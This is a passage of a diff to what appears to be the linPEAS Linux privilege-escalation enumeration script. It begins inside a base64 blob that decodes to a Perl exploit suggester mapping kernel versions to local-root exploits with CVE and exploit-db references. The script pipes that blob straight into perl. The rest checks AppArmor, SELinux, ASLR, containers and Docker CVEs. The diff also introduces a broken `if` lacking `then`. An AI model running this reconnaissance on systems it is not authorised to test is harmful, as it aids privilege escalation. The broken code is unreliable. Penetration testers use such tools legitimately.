csICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnZWNvbmV0JywKICAgICAgICBjdmUgPT4gJzIwMTAtNDA3MycsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE3Nzg3JywKICAgIH0sCiAgICAnY2Fwc190b19yb290JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicgXSwKICAgICAgICBjdmUgID0+ICduL2EnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTkxNicsCiAgICB9LAogICAgJ2FtZXJpY2FuLXNpZ24tbGFuZ3VhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC00MzQ3JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYmlkLzQ1NDA4JywKICAgIH0sCiAgICAncGt0Y2R2ZCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEwLTM0MzcnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTE1MCcsCiAgICB9LAogICAgJ3ZpZGVvNGxpbnV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMzA4MScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE1MDI0JywKICAgIH0sCiAgICAnbWVtb2RpcHBlcicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjM5JywgJzMuMC4wJywgJzMuMC4xJywgJzMuMC4yJywgJzMuMC4zJywgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTItMDA1NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzE4NDExJywKICAgIH0sCiAgICAnc2VtdGV4JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMzcnLCAnMi42LjM4JywgJzIuNi4zOScsICczLjAuMCcsICczLjAuMScsICczLjAuMicsCiAgICAgICAgICAgICczLjAuMycsICAnMy4wLjQnLCAgJzMuMC41JywgICczLjAuNicsICczLjEuMCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI1NDQ0JywKICAgIH0sCiAgICAncGVyZl9zd2V2ZW50JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICczLjAuMCcsICczLjAuMScsICczLjAuMicsICczLjAuMycsICczLjAuNCcsICczLjAuNScsCiAgICAgICAgICAgICczLjAuNicsICczLjEuMCcsICczLjIuMCcsICczLjMuMCcsICczLjQuMCcsICczLjQuMScsCiAgICAgICAgICAgICczLjQuMicsICczLjQuMycsICczLjQuNCcsICczLjQuNScsICczLjQuNicsICczLjQuOCcsCiAgICAgICAgICAgICczLjQuOScsICczLjUuMCcsICczLjYuMCcsICczLjcuMCcsICczLjguMCcsICczLjguMScsCiAgICAgICAgICAgICczLjguMicsICczLjguMycsICczLjguNCcsICczLjguNScsICczLjguNicsICczLjguNycsCiAgICAgICAgICAgICczLjguOCcsICczLjguOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTMtMjA5NCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzI2MTMxJywKICAgIH0sCiAgICAnbXNyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgICAgICcyLjYuMzUnLCAnMi42LjM2JywgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMC4wJywKICAgICAgICAgICAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgICczLjAuNScsICAnMy4wLjYnLAogICAgICAgICAgICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLCAgJzMuNS4wJywgICczLjYuMCcsCiAgICAgICAgICAgICczLjcuMCcsICAnMy43LjYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDEzLTAyNjgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yNzI5NycsCiAgICB9LAogICAgJ3RpbWVvdXRwd24nID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuNC4wJywgICczLjUuMCcsICAnMy42LjAnLCAgJzMuNy4wJywgICczLjguMCcsICAnMy44LjknLCAKICAgICAgICAgICAgJzMuOS4wJywgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC41JywgICczLjguNicsICAKICAgICAgICAgICAgJzMuOC45JywgICczLjkuMCcsICAnMy45LjYnLCAgJzMuMTAuMCcsICczLjEwLjYnLCAnMy4xMS4wJywKICAgICAgICAgICAgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xMy4xJwogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDE0LTAwMzgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8zMTM0NicsCiAgICB9LAogICAgJ3Jhd21vZGVQVFknID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLCAnMi42LjM2JywKICAgICAgICAgICAgJzIuNi4zNycsICcyLjYuMzgnLCAnMi42LjM5JywgJzMuMTQuMCcsICczLjE1LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTQtMDE5NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vcGFja2V0c3Rvcm1zZWN1cml0eS5jb20vZmlsZXMvZG93bmxvYWQvMTI2NjAzL2N2ZS0yMDE0LTAxOTYtbWQuYycsCiAgICB9LAogICAgJ292ZXJsYXlmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMy4xMy4wJywgJzMuMTYuMCcsICczLjE5LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTUtODY2MCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5MjMwJywKICAgIH0sCiAgICAncHBfa2V5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCgkJCSczLjQuMCcsICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy44LjAnLCAgJzMuOC4xJywgIAogICAgICAgICAgICAnMy44LjInLCAgJzMuOC4zJywgICczLjguNCcsICAnMy44LjUnLCAgJzMuOC42JywgICczLjguNycsICAKICAgICAgICAgICAgJzMuOC44JywgICczLjguOScsICAnMy45LjAnLCAgJzMuOS42JywgICczLjEwLjAnLCAnMy4xMC42JywgCiAgICAgICAgICAgICczLjExLjAnLCAnMy4xMi4wJywgJzMuMTMuMCcsICczLjEzLjEnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtMDcyOCcsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzM5Mjc3JywKICAgIH0sCiAgICAnZGlydHlfY293JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsIAoJCQknMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAKICAgICAgICAgICAgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsICcyLjYuMzcnLCAnMi42LjM4JywgCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywgIAogICAgICAgICAgICAnMy4wLjUnLCAgJzMuMC42JywgICczLjEuMCcsICAnMy4yLjAnLCAgJzMuMy4wJywgICczLjQuMCcsICAKICAgICAgICAgICAgJzMuNS4wJywgICczLjYuMCcsICAnMy43LjAnLCAgJzMuNy42JywgICczLjguMCcsICAnMy45LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTYtNTE5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQwNjE2JywKICAgIH0sCiAgICAnYWZfcGFja2V0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzQuNC4wJyBdLAogICAgICAgIGN2ZSA9PiAnMjAxNi04NjU1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDA4NzEnLAogICAgfSwKICAgICdwYWNrZXRfc2V0X3JpbmcnID0+IHsKICAgICAgICB2dWxuID0+IFsnNC44LjAnIF0sCiAgICAgICAgY3ZlID0+ICcyMDE3LTczMDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80MTk5NCcsCiAgICB9LAogICAgJ2Nsb25lX25ld3VzZXInID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzMuMy41JywgJzMuMy40JywgJzMuMy4yJywgJzMuMi4xMycsICczLjIuOScsICczLjIuMScsIAogICAgICAgICAgICAnMy4xLjgnLCAnMy4wLjUnLCAnMy4wLjQnLCAnMy4wLjInLCAnMy4wLjEnLCAnMy4yJywgJzMuMC4xJywgJzMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnTlxBJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMzgzOTAnLAogICAgfSwKICAgICdnZXRfcmVrdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnNC40LjAnLCAnNC44LjAnLCAnNC4xMC4wJywgJzQuMTMuMCcKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxNy0xNjY5NScsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzQ1MDEwJywKICAgIH0sCiAgICAnZXhwbG9pdF94JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsCiAgICAgICAgICAgICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsCiAgICAgICAgICAgICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsICcyLjYuMzYnLCAnMi42LjM3JywgJzIuNi4zOCcsCiAgICAgICAgICAgICcyLjYuMzknLCAnMy4wLjAnLCAgJzMuMC4xJywgICczLjAuMicsICAnMy4wLjMnLCAgJzMuMC40JywKICAgICAgICAgICAgJzMuMC41JywgICczLjAuNicsICAnMy4xLjAnLCAgJzMuMi4wJywgICczLjMuMCcsICAnMy40LjAnLAogICAgICAgICAgICAnMy41LjAnLCAgJzMuNi4wJywgICczLjcuMCcsICAnMy43LjYnLCAgJzMuOC4wJywgICczLjkuMCcsCiAgICAgICAgICAgICczLjEwLjAnLCAnMy4xMS4wJywgJzMuMTIuMCcsICczLjEzLjAnLCAnMy4xNC4wJywgJzMuMTUuMCcsCiAgICAgICAgICAgICczLjE2LjAnLCAnMy4xNy4wJywgJzMuMTguMCcsICczLjE5LjAnLCAnNC4wLjAnLCAgJzQuMS4wJywKICAgICAgICAgICAgJzQuMi4wJywgICc0LjMuMCcsICAnNC40LjAnLCAgJzQuNS4wJywgICc0LjYuMCcsICAnNC43LjAnCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTgtMTQ2NjUnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy80NTY5NycsCiAgICB9LAogICk7Cn0KCl9fRU5EX18KPWhlYWQxIE5BTUUKCmxpbnV4X2V4cGxvaXRfc3VnZ2VzdGVyLTIucGwgLSBBIGxvY2FsIGV4cGxvaXQgc3VnZ2VzdGVyIGZvciBsaW51eAoKPWhlYWQxIERFU0NSSVBUSU9OCgpUaGlzIHBlcmwgc2NyaXB0IHdpbGwgZW51bWVyYXRlIHRoZSBwb3NzaWJsZSBleHBsb2l0cyBhdmFpbGFibGUgZm9yIGEgZ2l2ZW4ga2VybmVsIHZlcnNpb24KCj1oZWFkMSBVU0FHRQoKWy1oXSBIZWxwICh0aGlzIG1lc3NhZ2UpClsta10gS2VybmVsIG51bWJlciAoZWcuIDIuNi4yOCkKWy1kXSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudQoKWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KQp0byBzZWUgYWxsIGV4cGxvaXRzIGF2YWlsYWJsZS4KCj1oZWFkMSBBVVRIT1IKCkpvbmF0aGFuIERvbmFzIChjKSAyMDE5Cgo9Y3V0Cgo9aGVhZDEgTElDRU5TRQoKIExpbnV4IEV4cGxvaXQgU3VnZ2VzdGVyIDIKCiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkKIHRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb247IGVpdGhlciB2ZXJzaW9uIDIgb2YgdGhlIExpY2Vuc2UsIG9yCiAoYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLgoKIFRoaXMgcHJvZ3JhbSBpcyBkaXN0cmlidXRlZCBpbiB0aGUgaG9wZSB0aGF0IGl0IHdpbGwgYmUgdXNlZnVsLAogYnV0IFdJVEhPVVQgQU5ZIFdBUlJBTlRZOyB3aXRob3V0IGV2ZW4gdGhlIGltcGxpZWQgd2FycmFudHkgb2YKIE1FUkNIQU5UQUJJTElUWSBvciBGSVRORVNTIEZPUiBBIFBBUlRJQ1VMQVIgUFVSUE9TRS4gIFNlZSB0aGUKIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGZvciBtb3JlIGRldGFpbHMuCiAgICAgICAgCiBZb3Ugc2hvdWxkIGhhdmUgcmVjZWl2ZWQgYSBjb3B5IG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhbG9uZwogd2l0aCB0aGlzIHByb2dyYW07IGlmIG5vdCwgd3JpdGUgdG8gdGhlIEZyZWUgU29mdHdhcmUgRm91bmRhdGlvbiwgSW5jLiwKIDUxIEZyYW5rbGluIFN0cmVldCwgRmlmdGggRmxvb3IsIEJvc3RvbiwgTUEgMDIxMTAtMTMwMSBVU0EuCgo9Y3V0Cg==" echo $les2_b64 | base64 -d | perl echo "" - fi +fi - if [ "$(command -v brew 2>/dev/null)" ]; then +if [ "$(command -v brew 2>/dev/null)" ]; then print_2title "Brew Doctor Suggestions" brew doctor echo "" - fi +fi - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? .............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then +#-- SY) AppArmor +print_2title "Protections" +print_list "AppArmor enabled? .............. "$NC +if [ "$(command -v aa-status 2>/dev/null)" ]; then aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then +elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then +elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then ls -d /etc/apparmor* - else +else echo_not_found "AppArmor" - fi +fi - #-- SY) grsecurity - print_list "grsecurity present? ............ "$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") +#-- SY) grsecurity +print_list "grsecurity present? ............ "$NC +( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") +#-- SY) PaX +print_list "PaX bins present? .............. "$NC +(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," +#-- SY) Execshield +print_list "Execshield enabled? ............ "$NC +(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," +#-- SY) SElinux +print_list "SELinux enabled? ............... "$NC +(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then +#-- SY) Gatekeeper +if [ "$MACPEAS" ]; then print_list "Gatekeeper enabled? .......... "$NC (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - + print_list "sleepimage encrypted? ........ "$NC (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no @@ -1395,1045 +1407,995 @@ if echo $CHECKS | grep -q SysI; then print_list "Connected to AD? ............. "$NC dsconfigad -show && echo "" || echo_no - fi +fi - #-- SY) ASLR - print_list "Is ASLR enabled? ............... "$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then +#-- SY) ASLR +print_list "Is ASLR enabled? ............... "$NC +ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) +if [ -z "$ASLR" ]; then echo_not_found "/proc/sys/kernel/randomize_va_space"; - else +else if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi echo "" - fi +fi - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null +#-- SY) Printer +print_list "Printer? ....................... "$NC +(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then +#-- SY) Running in a virtual environment +print_list "Is this a virtual machine? ..... "$NC +hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) +if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then detectedvirt=$(systemd-detect-virt) if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else +else if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck +if echo $CHECKS | grep -q container; +print_title "Container" +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" +print_2title "Container related tools present" +command -v "$CONTAINER_CMDS" - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" - print_list "Any running containers? ........ "$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then - echo_no - else - containerCounts="" - if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi - if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi - if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi - if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," - # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi +print_list "Any running containers? ........ "$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +echo_no +else +containerCounts="" +if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi +if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi +if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi +if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi +echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," +# List any running containers +if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi +if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi +fi - #If docker - if echo "$containerType" | grep -qi "docker"; then - print_2title "Docker Container details" - inDockerGroup - print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets\n"$NC - enumerateDockerSockets - print_list "Docker version .................$NC$dockerVersion" - checkDockerVersionExploits - print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ 